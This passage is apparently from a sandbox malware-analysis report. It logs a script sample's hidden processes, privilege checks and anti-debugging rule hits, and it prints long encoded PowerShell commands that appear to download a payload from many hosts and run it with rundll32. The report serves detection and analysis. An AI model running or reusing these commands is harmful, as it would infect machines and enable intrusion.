QQBEAEEAQQBNAFEAQQB1AEEARABFAEEATgBnAEEAMABBAEMANABBAE0AUQBBAHcAQQBEAGcAQQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABjAGwAYQBtAG8AdQByAGkAcwB0AC4AegBvAG8AYgBsAGEAcwB0ACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgA0ADgAOQAwADcAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBHAE0AQQBiAEEAQgBoAEEARwAwAEEAYgB3AEIAMQBBAEgASQBBAGEAUQBCAHoAQQBIAFEAQQBMAGcAQgA2AEEARwA4AEEAYgB3AEIAaQBBAEcAdwBBAFkAUQBCAHoAQQBIAFEAQQBMAEEAQgBpAEEARwBrAEEAYgBnAEIAawBBAEQAcwBBACIAOwAkAEQAZQBjAHUAcgByAGUAbgBjAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE0AQQBBAHUAQQBEAEkAQQBNAGcAQQB3AEEAQwA0AEEATQBRAEEAdwBBAEQAZwBBAEwAZwBBADQAQQBEAEUAQQB6AFYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABVAEEAYgBnAEIAbABBAEcAMABBAGMAQQBCAHMAQQBHADgAQQBlAFEAQgBsAEEARwBRAEEATABnAEIAdwBBAEcAZwBBAGIAdwBCADAAQQBHADgAQQBjAHcAQQA9ACIAOwAkAFMAdABlAGcAYQBuAG8AcABvAGQAbwB1AHMAUgBpAGMAaABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAE0AQQBOAGcAQQB1AEEARABFAEEATgBBAEEAeQBBAEMANABBAE0AUQBBAHkAQQBEAFkAQQBMAGcAQQB5AEEARABJAEEATQBnAEEAPQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE4AZwBBAHUAQQBEAEUAQQBPAFEAQQAzAEEAQwA0AEEATgBnAEEANQBBAEMANABBAE4AdwBBAHgAQQBBAD0APQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE0AUQBBAHUAQQBEAEkAQQBNAGcAQQAyAEEAQwA0AEEATQBnAEEAeABBAEQAawBBAEwAZwBBADEAQQBEAE0AQQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE8AQQBBAHUAQQBEAEUAQQBPAEEAQQB4AEEAQwA0AEEATQBRAEEAMgBBAEQAYwBBAEwAZwBBAHgAQQBEAFkAQQBPAEEAQQA9ACIAOwAkAFQAZQBuAGEAaQBsAHMASgB1AG0AcABvAGYAZgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AUQBBAHoAQQBDADQAQQBNAGcAQQB5AEEARABjAEEATABnAEEAMABBAEQAZwBBAEwAZwBBAHgAQQBEAGMAQQBPAEEAQQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW May 25, 2023, 10:44 a.m.	show_type: 0 filepath_r: wscript parameters: "C:\ProgramData\overrimBowsie.js" TherapeutismUnadopt dutchess crystallising filepath: wscript	1	1	0
ShellExecuteExW May 25, 2023, 10:44 a.m.	show_type: 0 filepath_r: powershell parameters: -encodedcommand "JABBAG4AbwBtAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE4AUQBBAHgAQQBDADQAQQBNAFEAQQAwAEEARABVAEEATABnAEEAeQBBAEQAQQBBAE4AZwBBAHUAQQBEAEUAQQBPAFEAQQB4AEEAQQA9AD0AIgA7ACQAcABoAGEAcgBtAGEAYwBvAHAAZQBkAGkAYQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE8AQQBBAHUAQQBEAEkAQQBNAFEAQQB3AEEAQwA0AEEATwBBAEEAMQBBAEMANABBAE0AUQBBADAAQQBEAFUAQQBMAHcAQQA1AEEARQA0AEEAYQBRAEEAMABBAEMAOABBAE8AUQBBAD0AYgBMAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBBAEEAdQBBAEQARQBBAE4AUQBBAHcAQQBDADQAQQBNAFEAQQA1AEEARABJAEEATABnAEEAeABBAEQAWQBBAE0AQQBBAHYAQQBHAG8AQQBNAEEAQgBKAEEARwBnAEEAWQB3AEEAdgBBAEYAQQBBAE4AZwBBAHcAQQBHAGMAQQBiAHcAQQA9AGIATABHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE4AdwBBAHUAQQBEAEUAQQBNAHcAQQAyAEEAQwA0AEEATQBnAEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAEEAQQBPAFEAQQB2AEEARgBRAEEATQBBAEEAdgBBAEgAawBBAGEAdwBCAEwAQQBFAFEAQQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAFUAQQBMAGcAQQA0AEEARABjAEEATABnAEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAFUAQQBNAEEAQQB2AEEARABJAEEATAB3AEEAMQBBAEEAPQA9AGIATABHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBGAEUAQQBWAHcAQgBrAEEARABVAEEAUwBRAEIAVwBBAEYAZwBBAFUAdwBCAG8AQQBHAFUAQQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQA1AEEARABnAEEATAB3AEIAUQBBAEgAQQBBAFYAUQBCAFoAQQBGAGcAQQBMAHcAQgB3AEEARQA0AEEAWgBBAEIASgBBAEgAawBBAFYAdwBBAHgAQQBBAD0APQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBOAGcAQQB4AEEAQwA4AEEATwBRAEIAaABBAEQAWQBBAE4AdwBCAHcAQQBHAFUAQQBjAHcAQQB2AEEARABBAEEAZABnAEEAMABBAEcAbwBBAE0AQQBCAHgAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABGAGwAYQBwAHAAZQByAE8AbABhAG0AaQBjACAAaQBuACAAJABwAGgAYQByAG0AYQBjAG8AcABlAGQAaQBhACAALQBzAHAAbABpAHQAIAAiAGIATABHACIAKQAgAHsAdAByAHkAIAB7ACQARQB4AGMAaABhAG4AZwBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAEUAQQBkAFEAQgBsAEEASABJAEEAYwB3AEIAdwBBAEgASQBBAGQAUQBCAHUAQQBHAGMAQQBRAGcAQgBsAEEARwB3AEEAYgBBAEIAMwBBAEcAOABBAGMAZwBCADAAQQBIAE0AQQBMAGcAQgBuAEEARwBFAEEAYwBnAEIAawBBAEcAVQBBAGIAZwBBAD0AdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIATwBBAEcAOABBAGIAZwBCAHcAQQBHADgAQQBaAFEAQgAwAEEARwBrAEEAWQB3AEEAdQBBAEgATQBBAGQAUQBCAHkAQQBHAGMAQQBaAFEAQgB5AEEASABrAEEAdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUATQBBAGEAQQBCAHAAQQBHAE0AQQBhAHcAQgAzAEEARwBVAEEAWgBRAEIAawBBAEMANABBAGMAdwBCADAAQQBIAFUAQQBaAEEAQgBwAEEARwA4AEEAdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AdwBBADUAQQBDADQAQQBNAFEAQQB4AEEARABrAEEATABnAEEAeABBAEQAYwBBAE4AUQBBAHUAQQBEAGsAQQBOAGcAQQA9ACIAOwAkAEYAbABpAGMAawBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBRAEEAYwBnAEIAcABBAEcANABBAGIAdwBCAGsAQQBHAFUAQQBVAEEAQgB5AEEARwA4AEEAZABnAEIAcABBAEcANABBAFoAdwBCAHMAQQBIAGsAQQBMAGcAQgBoAEEARwBVAEEAIgA7ACQATABlAHQAdAByAHUAcgBlAE8AdgBlAHIAYQBiAHUAcwBpAHYAZQBuAGUAcwBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEYAbABhAHAAcABlAHIATwBsAGEAbQBpAGMAKQApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABMAGUAdAB0AHIAdQByAGUATwB2AGUAcgBhAGIAdQBzAGkAdgBlAG4AZQBzAHMAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYwBsAGEAbQBvAHUAcgBpAHMAdAAuAHoAbwBvAGIAbABhAHMAdAA7ACQAQQBzAHMAaQBkAHUAbwB1AHMAbgBlAHMAcwBEAGUAbgBhAHQAdQByAGEAdABpAG8AbgBhAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAE0AQQBkAEEAQgBwAEEARwA0AEEAZABBAEIAcABBAEcANABBAFoAdwBCAHMAQQBIAGsAQQBUAFEAQgBwAEEARwA0AEEAWgBRAEIAeQBBAEcARQBBAGEAUQBCAHYAQQBHAGMAQQBhAFEAQgBqAEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBAEoAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQB3AEEAMwBBAEMANABBAE0AUQBBADMAQQBEAGMAQQBMAGcAQQB4AEEARABRAEEATwBRAEEAdQBBAEQAYwBBAE4AdwBBAD0ASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAGMAQQBMAGcAQQA0AEEARABBAEEATABnAEEAeQBBAEQAVQBBAE0AZwBBAHUAQQBEAEkAQQBNAEEAQQB4AEEAQQA9AD0ASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEUAQQBHAFUAQQBiAFEAQgAxAEEARwB3AEEAWQB3AEIAbABBAEcANABBAGQAQQBCAHoAQQBDADQAQQBaAGcAQgB5AEEAQQA9AD0AIgA7ACQAcwBwAHIAaQB0AGUAaABvAG8AZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMQBBAEQAVQBBAEwAZwBBAHkAQQBEAEEAQQBNAFEAQQB1AEEARABFAEEATgBnAEEAMABBAEMANABBAE0AUQBBAHcAQQBEAGcAQQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABjAGwAYQBtAG8AdQByAGkAcwB0AC4AegBvAG8AYgBsAGEAcwB0ACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgA0ADgAOQAwADcAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBHAE0AQQBiAEEAQgBoAEEARwAwAEEAYgB3AEIAMQBBAEgASQBBAGEAUQBCAHoAQQBIAFEAQQBMAGcAQgA2AEEARwA4AEEAYgB3AEIAaQBBAEcAdwBBAFkAUQBCAHoAQQBIAFEAQQBMAEEAQgBpAEEARwBrAEEAYgBnAEIAawBBAEQAcwBBACIAOwAkAEQAZQBjAHUAcgByAGUAbgBjAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE0AQQBBAHUAQQBEAEkAQQBNAGcAQQB3AEEAQwA0AEEATQBRAEEAdwBBAEQAZwBBAEwAZwBBADQAQQBEAEUAQQB6AFYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABVAEEAYgBnAEIAbABBAEcAMABBAGMAQQBCAHMAQQBHADgAQQBlAFEAQgBsAEEARwBRAEEATABnAEIAdwBBAEcAZwBBAGIAdwBCADAAQQBHADgAQQBjAHcAQQA9ACIAOwAkAFMAdABlAGcAYQBuAG8AcABvAGQAbwB1AHMAUgBpAGMAaABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAE0AQQBOAGcAQQB1AEEARABFAEEATgBBAEEAeQBBAEMANABBAE0AUQBBAHkAQQBEAFkAQQBMAGcAQQB5AEEARABJAEEATQBnAEEAPQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE4AZwBBAHUAQQBEAEUAQQBPAFEAQQAzAEEAQwA0AEEATgBnAEEANQBBAEMANABBAE4AdwBBAHgAQQBBAD0APQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE0AUQBBAHUAQQBEAEkAQQBNAGcAQQAyAEEAQwA0AEEATQBnAEEAeABBAEQAawBBAEwAZwBBADEAQQBEAE0AQQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE8AQQBBAHUAQQBEAEUAQQBPAEEAQQB4AEEAQwA0AEEATQBRAEEAMgBBAEQAYwBBAEwAZwBBAHgAQQBEAFkAQQBPAEEAQQA9ACIAOwAkAFQAZQBuAGEAaQBsAHMASgB1AG0AcABvAGYAZgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AUQBBAHoAQQBDADQAQQBNAGcAQQB5AEEARABjAEEATABnAEEAMABBAEQAZwBBAEwAZwBBAHgAQQBEAGMAQQBPAEEAQQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A" filepath: powershell	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 25, 2023, 10:44 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (16 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

One or more non-whitelisted processes were created (4 events)

parent_process	wscript.exe	martian_process	wscript "C:\ProgramData\overrimBowsie.js" TherapeutismUnadopt dutchess crystallising
parent_process	wscript.exe	martian_process	"C:\Windows\System32\wscript.exe" "C:\ProgramData\overrimBowsie.js" TherapeutismUnadopt dutchess crystallising
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABBAG4AbwBtAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE4AUQBBAHgAQQBDADQAQQBNAFEAQQAwAEEARABVAEEATABnAEEAeQBBAEQAQQBBAE4AZwBBAHUAQQBEAEUAQQBPAFEAQQB4AEEAQQA9AD0AIgA7ACQAcABoAGEAcgBtAGEAYwBvAHAAZQBkAGkAYQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE8AQQBBAHUAQQBEAEkAQQBNAFEAQQB3AEEAQwA0AEEATwBBAEEAMQBBAEMANABBAE0AUQBBADAAQQBEAFUAQQBMAHcAQQA1AEEARQA0AEEAYQBRAEEAMABBAEMAOABBAE8AUQBBAD0AYgBMAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBBAEEAdQBBAEQARQBBAE4AUQBBAHcAQQBDADQAQQBNAFEAQQA1AEEARABJAEEATABnAEEAeABBAEQAWQBBAE0AQQBBAHYAQQBHAG8AQQBNAEEAQgBKAEEARwBnAEEAWQB3AEEAdgBBAEYAQQBBAE4AZwBBAHcAQQBHAGMAQQBiAHcAQQA9AGIATABHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE4AdwBBAHUAQQBEAEUAQQBNAHcAQQAyAEEAQwA0AEEATQBnAEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAEEAQQBPAFEAQQB2AEEARgBRAEEATQBBAEEAdgBBAEgAawBBAGEAdwBCAEwAQQBFAFEAQQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAFUAQQBMAGcAQQA0AEEARABjAEEATABnAEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAFUAQQBNAEEAQQB2AEEARABJAEEATAB3AEEAMQBBAEEAPQA9AGIATABHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBGAEUAQQBWAHcAQgBrAEEARABVAEEAUwBRAEIAVwBBAEYAZwBBAFUAdwBCAG8AQQBHAFUAQQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQA1AEEARABnAEEATAB3AEIAUQBBAEgAQQBBAFYAUQBCAFoAQQBGAGcAQQBMAHcAQgB3AEEARQA0AEEAWgBBAEIASgBBAEgAawBBAFYAdwBBAHgAQQBBAD0APQBiAEwARwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBOAGcAQQB4AEEAQwA4AEEATwBRAEIAaABBAEQAWQBBAE4AdwBCAHcAQQBHAFUAQQBjAHcAQQB2AEEARABBAEEAZABnAEEAMABBAEcAbwBBAE0AQQBCAHgAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABGAGwAYQBwAHAAZQByAE8AbABhAG0AaQBjACAAaQBuACAAJABwAGgAYQByAG0AYQBjAG8AcABlAGQAaQBhACAALQBzAHAAbABpAHQAIAAiAGIATABHACIAKQAgAHsAdAByAHkAIAB7ACQARQB4AGMAaABhAG4AZwBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAEUAQQBkAFEAQgBsAEEASABJAEEAYwB3AEIAdwBBAEgASQBBAGQAUQBCAHUAQQBHAGMAQQBRAGcAQgBsAEEARwB3AEEAYgBBAEIAMwBBAEcAOABBAGMAZwBCADAAQQBIAE0AQQBMAGcAQgBuAEEARwBFAEEAYwBnAEIAawBBAEcAVQBBAGIAZwBBAD0AdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIATwBBAEcAOABBAGIAZwBCAHcAQQBHADgAQQBaAFEAQgAwAEEARwBrAEEAWQB3AEEAdQBBAEgATQBBAGQAUQBCAHkAQQBHAGMAQQBaAFEAQgB5AEEASABrAEEAdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUATQBBAGEAQQBCAHAAQQBHAE0AQQBhAHcAQgAzAEEARwBVAEEAWgBRAEIAawBBAEMANABBAGMAdwBCADAAQQBIAFUAQQBaAEEAQgBwAEEARwA4AEEAdQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AdwBBADUAQQBDADQAQQBNAFEAQQB4AEEARABrAEEATABnAEEAeABBAEQAYwBBAE4AUQBBAHUAQQBEAGsAQQBOAGcAQQA9ACIAOwAkAEYAbABpAGMAawBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBRAEEAYwBnAEIAcABBAEcANABBAGIAdwBCAGsAQQBHAFUAQQBVAEEAQgB5AEEARwA4AEEAZABnAEIAcABBAEcANABBAFoAdwBCAHMAQQBIAGsAQQBMAGcAQgBoAEEARwBVAEEAIgA7ACQATABlAHQAdAByAHUAcgBlAE8AdgBlAHIAYQBiAHUAcwBpAHYAZQBuAGUAcwBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEYAbABhAHAAcABlAHIATwBsAGEAbQBpAGMAKQApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABMAGUAdAB0AHIAdQByAGUATwB2AGUAcgBhAGIAdQBzAGkAdgBlAG4AZQBzAHMAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYwBsAGEAbQBvAHUAcgBpAHMAdAAuAHoAbwBvAGIAbABhAHMAdAA7ACQAQQBzAHMAaQBkAHUAbwB1AHMAbgBlAHMAcwBEAGUAbgBhAHQAdQByAGEAdABpAG8AbgBhAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAE0AQQBkAEEAQgBwAEEARwA0AEEAZABBAEIAcABBAEcANABBAFoAdwBCAHMAQQBIAGsAQQBUAFEAQgBwAEEARwA0AEEAWgBRAEIAeQBBAEcARQBBAGEAUQBCAHYAQQBHAGMAQQBhAFEAQgBqAEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBAEoAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQB3AEEAMwBBAEMANABBAE0AUQBBADMAQQBEAGMAQQBMAGcAQQB4AEEARABRAEEATwBRAEEAdQBBAEQAYwBBAE4AdwBBAD0ASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAGMAQQBMAGcAQQA0AEEARABBAEEATABnAEEAeQBBAEQAVQBBAE0AZwBBAHUAQQBEAEkAQQBNAEEAQQB4AEEAQQA9AD0ASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEUAQQBHAFUAQQBiAFEAQgAxAEEARwB3AEEAWQB3AEIAbABBAEcANABBAGQAQQBCAHoAQQBDADQAQQBaAGcAQgB5AEEAQQA9AD0AIgA7ACQAcwBwAHIAaQB0AGUAaABvAG8AZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMQBBAEQAVQBBAEwAZwBBAHkAQQBEAEEAQQBNAFEAQQB1AEEARABFAEEATgBnAEEAMABBAEMANABBAE0AUQBBAHcAQQBEAGcAQQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABjAGwAYQBtAG8AdQByAGkAcwB0AC4AegBvAG8AYgBsAGEAcwB0ACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgA0ADgAOQAwADcAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBHAE0AQQBiAEEAQgBoAEEARwAwAEEAYgB3AEIAMQBBAEgASQBBAGEAUQBCAHoAQQBIAFEAQQBMAGcAQgA2AEEARwA4AEEAYgB3AEIAaQBBAEcAdwBBAFkAUQBCAHoAQQBIAFEAQQBMAEEAQgBpAEEARwBrAEEAYgBnAEIAawBBAEQAcwBBACIAOwAkAEQAZQBjAHUAcgByAGUAbgBjAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE0AQQBBAHUAQQBEAEkAQQBNAGcAQQB3AEEAQwA0AEEATQBRAEEAdwBBAEQAZwBBAEwAZwBBADQAQQBEAEUAQQB6AFYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABVAEEAYgBnAEIAbABBAEcAMABBAGMAQQBCAHMAQQBHADgAQQBlAFEAQgBsAEEARwBRAEEATABnAEIAdwBBAEcAZwBBAGIAdwBCADAAQQBHADgAQQBjAHcAQQA9ACIAOwAkAFMAdABlAGcAYQBuAG8AcABvAGQAbwB1AHMAUgBpAGMAaABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAE0AQQBOAGcAQQB1AEEARABFAEEATgBBAEEAeQBBAEMANABBAE0AUQBBAHkAQQBEAFkAQQBMAGcAQQB5AEEARABJAEEATQBnAEEAPQBPAGE